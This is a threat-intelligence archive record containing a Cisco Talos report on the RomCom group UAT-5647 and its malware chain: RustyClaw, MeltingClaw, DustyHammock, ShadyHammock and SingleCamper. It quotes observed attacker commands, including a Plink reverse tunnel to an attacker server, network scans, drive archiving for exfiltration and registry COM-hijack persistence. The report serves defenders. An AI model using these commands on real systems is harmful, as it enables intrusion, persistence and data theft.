{
	"id": "314848ec-d777-40ed-9b1e-b06b6cbd6408",
	"created_at": "2026-04-06T00:08:21.413908Z",
	"updated_at": "2026-04-10T03:26:22.923466Z",
	"deleted_at": null,
	"sha1_hash": "a398676fe283fb830f072ac459612abd9191c35b",
	"title": "UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 211419,
	"plain_text": "UAT-5647 targets Ukrainian and Polish entities with RomCom\r\nmalware variants\r\nBy Dmytro Korzhevin\r\nPublished: 2024-10-17 · Archived: 2026-04-05 16:50:48 UTC\r\nCisco Talos has observed a new wave of attacks active since at least late 2023, from a Russian speaking\r\ngroup we track as “UAT-5647”, against Ukrainian government entities and unknown Polish entities. \r\nUAT-5647 is also known as  RomCom and is widely attributed to Russian speaking threat actors in open-source reporting.  \r\nThe latest series of attacks deploys an updated version of the RomCom malware we track as\r\n“SingleCamper”. This version is loaded directly from registry into memory and uses loopback address to\r\ncommunicate with its loader.\r\nUAT-5647 has also evolved their tooling to include four distinct malware families: two downloaders we\r\ntrack as RustClaw and MeltingClaw; a RUST-based backdoor we call DustyHammock; and a C++ based\r\nbackdoor we call ShadyHammock.\r\nDuring its lateral movement, the threat actor attempted to compromise edge devices by tunneling internal\r\ninterfaces to external, remote hosts controlled by UAT-5647. If successful, it would have higher chances of\r\nevading detection during the incident response process. \r\nUAT-5647 has long been considered a multi-motivational threat actor performing both ransomware and espionage-oriented attacks. However, UAT-5647 has accelerated their attacks in recent months with a clear focus on\r\nestablishing long–term access for exfiltrating data of strategic interest to them. Our assessment, in line with recent\r\nreporting from CERT-UA and Palo Alto Networks, indicates that the threat actor is aggressively expanding their\r\ntooling and infrastructure to support a wide variety of malware components authored in diverse languages and\r\nplatforms such as GoLang, C++, RUST and LUA.  
\r\nTalos further assesses that this specific series of attacks, targeting high-profile Ukrainian entities, is likely meant to serve UAT-5647's two-pronged strategy in a staged manner: establish long-term access and exfiltrate data for as long as possible to support espionage motives, and then potentially pivot to ransomware deployment to disrupt and likely financially gain from the compromise. It is also likely that Polish entities were targeted, based on the keyboard language checks performed by the malware.\r\nUAT-5647 infection chain\r\nThe infection chain consists of a spear-phishing message delivering a downloader of either of two variants: “RustyClaw”, a RUST-based downloader, and a C++ based variant we track as “MeltingClaw”. The downloaders make way for and establish persistence for two distinct backdoors we call “DustyHammock” and “ShadyHammock,” respectively.\r\nhttps://blog.talosintelligence.com/uat-5647-romcom/\r\nPage 1 of 13\n\nDustyHammock is a more straightforward backdoor meant to be the core malicious component of the infection, communicating with its command and control (C2) and performing malicious actions. ShadyHammock is, however, a two-pronged backdoor responsible for loading and activating the SingleCamper implant (RomCom malware variant) on an infected system and optionally listening for incoming commands from another malicious component.\r\nThe overall infection chain can be visualized as:\r\nUAT-5647's post-compromise activity\r\nThe post-compromise activity by UAT-5647 is standard for a threat actor whose primary motivation is espionage. There is, however, one set of actions that stands out: it is our assessment that at some point the threat actor started targeting the edge devices from inside the compromised network. This and other activities are detailed in the following sub-sections.
\r\nTunneling into the enterprise\r\nOnce preliminary network reconnaissance was completed, UAT-5647 downloaded PuTTY’s Plink tool to establish remote tunnels between accessible endpoints and attacker-controlled servers [T1572]. While this is a common practice, one of the configurations was mapping the internal admin port of an edge device.\r\ncmd /C %public%\\pictures\\iestatus[.]exe -pw _passwd_ -batch -hostkey SHA256:_KEY_ -N -R 8080:_IP_IN_I\r\nAny traffic sent to Port 8088 on the attacker-controlled remote server will be forwarded to Port 80 on \u003cIP_IN_INFECTED_NETWORK\u003e. This technique effectively exposes the application on Port 80 to the attackers, allowing them to:\r\nBrute force or password spray to gain access to the service.\r\nMonitor and exfiltrate data and configuration from the application once access has been achieved.\r\nBased on URLs exposed to the threat actors now on Port 8088, such as “hxxp[://]193[.]42[.]36[.]131:8088/help/LanArpBindingListHelpRpm[.]htm” and “userRpm/VirtualServerRpm.htm”, and Censys data, it is likely that the \u003cIP_IN_INFECTED_NETWORK\u003e IP address is a “TP-LINK Wireless G Router WR340G”.\r\nUAT-5647’s lateral movement and system discovery\r\nThe threat actors were particularly interested in network reconnaissance, evident from the repeated ping sweeps they carried out to find adjoining systems [T1016]:\r\npowershell -command 1..254 | % {ping -n 1 -a -w 100 192.168.0.$_} | Select-String \\[\r\nOnce UAT-5647 deemed a specific system on the network interesting, they could take one of two actions:\r\nBased on the results of the ping sweep (ICMP sweep), UAT-5647 created and executed a customized batch (BAT) file named “nv[.]bat”. 
The BAT file is used to run “net view” to obtain a list of shares exposed on specific IPs [T1135]:\r\nnet view /all [\\][\\]192[.]168[.]XXX[.]XXX\r\nnet view /all [\\][\\]192[.]168[.]XXX[.]XXX\r\nnet view /all [\\][\\]192[.]168[.]XXX[.]XXX\r\nnet view /all [\\][\\]192[.]168[.]XXX[.]XXX\r\nUAT-5647 further pinged additional endpoints in the network, this time using their hostnames and specific IPs [T1016]:\r\nping -n 1 \u003cIP\u003e\r\nping -n 1 \u003chostname\u003e\r\nA successful response from the system leads to shared folder reconnaissance [T1135]:\r\ndir [\\][\\]192[.]168[.]0[.]XXX\\c$\r\ndir [\\][\\]\u003chostname\u003e\\c$\r\nThey then ran highly specific port scans on it, likely to find means of obtaining unauthorized access to it:\r\npowershell -c $ips = @(\"\u003cIP_ADDRESS\u003e\"); $ports = @(\"22\", \"80\", \"443\"); foreach ($ip in $ips) { forea\r\nLater the threat actor expanded their port scans to other IP addresses in the network:\r\npowershell -Command $ips = @(\"\u003cIP_ADDRESS\u003e\", \"\u003cIP_ADDRESS\u003e\", ...., \"\u003cIP_ADDRESS\u003e\", \"\u003cIP_ADDRESS\u003e\");\r\nSystem and user discovery\r\nEven though the C2 may have automatically issued a limited set of commands to the last-stage implants, the attackers opened a reverse shell (via cmd[.]exe) to conduct further reconnaissance. 
This activity primarily consists of user and system discovery tasks. The commands observed, mapped to their MITRE ATT\u0026CK techniques:\r\nwhoami, whoami /all: System Owner/User Discovery [T1003]\r\nchcp: System Location Discovery: System Language Discovery [T1614/001]\r\nsysteminfo, ipconfig /all, powershell -c get-volume, tasklist, arp -a, net user, tasklist /v, netstat -ano: System Information Discovery [T1082]\r\nnltest /domain_trusts: Domain Trust Discovery [T1482]\r\ndir C:\\Program Files, dir C:\\Users, dir %userprofile%, dir %userprofile%\\Downloads, dir %userprofile%\\Desktop, dir %userprofile%\\Documents, dir %localappdata%, dir /s C:\\ProgramData, dir %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\, dir %localappdata%, dir c:\\users, dir %public%: File and Directory Discovery [T1083]\r\nnet localgroup, net localgroup administrators, net share: Permission Groups Discovery: Local Groups [T1069/001]\r\ncmd /C reg export hkcu %public%\\music\\hkcu.txt, cmd /C reg export hklm %public%\\pictures\\hklm.txt, cmd /C reg query hklm\\software, cmd /C reg query hklm\\software\\\u003cproduct_name\u003e, cmd /C reg query hklm\\SYSTEM\\CurrentControlSet\\Services\\\u003cproduct_name\u003e /s: Query Registry [T1012]\r\nData exfiltration activity\r\nIn parallel, we also observed the operators attempting to stage entire drives for exfiltration from the infected system [T1560]:\r\npowershell -c Compress-Archive -Path d:\\ -DestinationPath C:\\Users\\\u003cuser\u003e\\Documents\\d.zip\r\nHowever, they also collected specific folders on disk. In this specific case the threat actor is exfiltrating the “Recent” folder in what seems to be an attempt to understand the victim’s latest activity on the system. 
\r\ncmd /C powershell -c Compress-Archive -Path c:\\users\\\u003cusers\u003e\\appdata\\Roaming\\microsoft\\Windows\\Recent\r\nRustyClaw leads to DustyHammock\r\nRustyClaw is a RUST-based malware downloader that is targeted towards Polish, Ukrainian or Russian speaking users. The malware checks the keyboard layout to match one of the following language codes before proceeding with its malicious activities:\r\n415 – Polish\r\n422 – Ukrainian\r\n419 – Russian\r\n2000 – Unknown\r\nRustyClaw will then generate a hash of its file name to match it against a hardcoded value. This is an anti-analysis feature to prevent the malware from running in sandboxes that use randomized file names.\r\nOnce the checks have passed, the downloader will optionally download a decoy PDF to display to the infected user and then download the next-stage implant, DustyHammock, to locations on disk such as:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\KeyStore\\keyprov.dll\r\nThe following registry value is then set to the path of the next-stage payload (keyprov[.]dll):\r\nHKCU\\SOFTWARE\\Classes\\CLSID\\{2155fee3-2419-4373-b102-6843707eb41f}\\InprocServer32\r\nThis GUID is the CLSID for “CLSID_LocalIconCache”, that is, the ThumbCache entry. It is used by explorer[.]exe while rendering the thumbnails for file icons.\r\nThe downloader will then restart the explorer[.]exe process to load the next-stage payload DLL, DustyHammock, effectively trojanizing the process:\r\ncmd /C timeout 3 \u0026\u0026 taskkill /f /im explorer.exe \u0026\u0026 start explorer.exe\r\nDustyHammock – UAT-5647's latest backdoor\r\nDustyHammock is another RUST-based backdoor. It is configured to run preliminary, hardcoded reconnaissance commands on the infected system, gather their outputs, and send the information to its C2. The C2 then begins responding with tasks to perform on the infected system. 
The preliminary information collected is the MAC addresses, Windows version information, and computer\\username via the “whoami” and “chcp” commands.\r\nThe backdoor has the following capabilities:\r\nRun arbitrary commands on the infected endpoint.\r\nDownload and place files from the C2 onto the infected system.\r\nConnect to an IPNS CID, likely done to download additional payloads to the infected system. The CID accessed by the backdoor is “/ipns/k51qzi5uqu5dgn9wgsaxb7cfvinmk27eusoufaxrp8qd1ri5kamf41bg7gpydm”.\r\nInterPlanetary File System (IPFS) is a peer-to-peer network allowing resource hosting in a decentralized manner. InterPlanetary Name System (IPNS), a feature of IPFS, enables mutable referencing of resources hosted on IPFS networks, allowing uploaders to modify the content of the resource without changing its identifier (CID).\r\nNote that although similar in name, DustyHammock and ShadyHammock are in fact distinct implant families. ShadyHammock is coded in C++ and contains additional capabilities to bind itself and listen for incoming requests, a capability missing in DustyHammock. Although ShadyHammock has more features, DustyHammock seems to be its successor and was used as recently as September 2024 by UAT-5647. UAT-5647 likely decided to abandon additional components such as SingleCamper (loaded by ShadyHammock) in favor of a single last-stage implant, DustyHammock.\r\nMeltingClaw leads to ShadyHammock\r\nMeltingClaw is the second malware downloader UAT-5647 has used in this series of attacks. It is similar in behavior to RustyClaw, with varying configurations such as file names and locations. 
The next-stage payload, ShadyHammock, is dropped to a similar location such as:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\AppTemp\\libapi.dll\r\nThis DLL is loaded into explorer[.]exe by specifying it in the registry key:\r\nHKEY_USERS\\S-1-..-CLASSES\\CLSID\\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}\\InprocServer32\\\r\nThis GUID is the “Sync Registration” COM interface and is loaded into explorer[.]exe as well.\r\nApart from these capabilities that are common with RustyClaw, MeltingClaw will also download and store additional payloads in the Windows registry under:\r\nHKEY_CURRENT_USER\\Software\\AppDataSoft\\Software\\\r\nXOR-encoded SingleCamper DLL\r\nXOR-encoded malware DLL – currently unknown.\r\nThe implant version for the downloader: “UPDE\u003cnumber\u003e”\r\nThese payloads are then loaded and activated by ShadyHammock via explorer[.]exe as illustrated next. One of the payloads is a new variant of the RomCom backdoor, which we track as “SingleCamper”. The other payload is currently unknown.\r\nShadyHammock – a two-pronged backdoor\r\nShadyHammock is a simple and effective backdoor that carries out two primary tasks:\r\nLoad and run payloads placed in certain registry locations (by its parent MeltingClaw).\r\nBind to localhost and listen for incoming commands from a separate malicious component.\r\nShadyHammock’s load-and-run capability leads to SingleCamper\r\nThe malware will read registry values, specifically in the location:\r\nHKEY_CURRENT_USER\\Software\\AppDataSoft\\Software\\\r\nThere are usually three values in this registry key, two containing encoded copies of next-stage payloads and the third containing configuration-specific data such as the implant’s version.\r\nThe binary content of these registry values is read and decoded, resulting in a DLL that is simply traversed to find the export function. 
The resulting DLLs are loaded into memory to carry out more malicious activities. So far Talos has only discovered one DLL-based payload from the registry, which we track as “SingleCamper”. SingleCamper, a new version of the RomCom malware, was also recently disclosed in Palo Alto’s report as SnipBot.\r\nThe other payload is yet to be discovered (usually in the “trem2” or “state2” registry values). However, ShadyHammock already has the capability to deploy this payload on demand, provided that a specific command code is sent to it via the endpoint’s localhost interface.\r\nShadyHammock can accept commands from SingleCamper\r\nShadyHammock also has the ability to bind to a specific port (such as 1342) on localhost (127[.]0[.]0[.]1). Binding to localhost does not allow it to listen for incoming requests from remote hosts; it is a mechanism to communicate with SingleCamper.\r\nShadyHammock listening on Port 1342\r\nShadyHammock will listen for specific command phrases, based on which it performs specific actions. These actions consist of:\r\n“delete bot”: Issuing this command will result in the backdoor being deleted from the infected host. The backdoor will delete all registry keys and folders associated with it and then restart explorer[.]exe to execute a benign, non-trojanized copy of the process.\r\n“update bot work” or “start bot file”: these commands instruct the backdoor to decode and load the payload stored in the second registry value that may have been created by MeltingClaw - “trem2” or “state2”.\r\nThese commands are in fact issued to ShadyHammock by SingleCamper (RomCom). SingleCamper’s C2 server will issue a specific command code to it, based on which the malware will generate the command phrase such as “delete bot” and send it to ShadyHammock via the localhost interface. 
\r\nSingleCamper issuing commands to ShadyHammock via localhost\r\nSingleCamper – an update to RomCom\r\nSingleCamper is the key implant in this infection that carries out all of the malicious post-compromise activities. It is loaded by ShadyHammock after being read and decoded from the Windows registry.\r\nSingleCamper consists of the following capabilities:\r\nSend preliminary system information to the C2 for registering the infection. The data is sent over Port 443 (HTTPS) in the format:\r\n\u003cMAC_ADDRESS\u003e@RDPE1@@exist:\u003cBLAH\u003e-0:US:RDPE1:\\:\u003cOEM_CP_VALUE\u003e:\r\nExecute preliminary reconnaissance commands sent by the C2 and respond with the results, such as:\r\nnltest /domain_trusts\r\nsysteminfo\r\nipconfig /all\r\ndir C:\\\"program Files\" C:\\\"Program Files (x86)\" C:\\Users\r\nBased on the information received by the C2, the attackers decide whether the infected system is worth exploring further and carrying out post-compromise activities on. Therefore, any commands executed by SingleCamper after these preliminary commands may be human-operator-issued commands.\r\nReceive command codes and accompanying data from the C2 and perform malicious actions on the infected system, such as collecting system information, downloading additional payloads (such as PuTTY’s Plink), enumerating processes, and enumerating and exfiltrating files with specific extensions such as: txt, rtf, xls, xlsx, ods, cmd, pdf, vbs, ps1, one, kdb, kdbx, doc, docx, odt, eml, msg, email.\r\nSingleCamper can also send commands to its loader, ShadyHammock, to perform actions on the infected endpoint. Actions include deleting the infection and loading another payload from the registry, the same way ShadyHammock loads SingleCamper.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below. 
\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\r\nIOCs\r\nIOCs for this research can also be found at our GitHub repository here. 
\r\nSource: https://blog.talosintelligence.com/uat-5647-romcom/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/uat-5647-romcom/"
	],
	"report_names": [
		"uat-5647-romcom"
	],
	"threat_actors": [
		{
			"id": "555e2cac-931d-4ad4-8eaa-64df6451059d",
			"created_at": "2023-01-06T13:46:39.48103Z",
			"updated_at": "2026-04-10T02:00:03.342729Z",
			"deleted_at": null,
			"main_name": "RomCom",
			"aliases": [
				"UAT-5647",
				"Storm-0978"
			],
			"source_name": "MISPGALAXY:RomCom",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d58052ba-978b-4775-985a-26ed8e64f98c",
			"created_at": "2023-09-07T02:02:48.069895Z",
			"updated_at": "2026-04-10T02:00:04.946879Z",
			"deleted_at": null,
			"main_name": "Tropical Scorpius",
			"aliases": [
				"DEV-0978",
				"RomCom",
				"Storm-0671",
				"Storm-0978",
				"TA829",
				"Tropical Scorpius",
				"UAC-0180",
				"UNC2596",
				"Void Rabisu"
			],
			"source_name": "ETDA:Tropical Scorpius",
			"tools": [
				"COLDDRAW",
				"Cuba",
				"Industrial Spy",
				"PEAPOD",
				"ROMCOM",
				"ROMCOM RAT",
				"SingleCamper",
				"SnipBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434101,
	"ts_updated_at": 1775791582,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a398676fe283fb830f072ac459612abd9191c35b.pdf",
		"text": "https://archive.orkl.eu/a398676fe283fb830f072ac459612abd9191c35b.txt",
		"img": "https://archive.orkl.eu/a398676fe283fb830f072ac459612abd9191c35b.jpg"
	}
}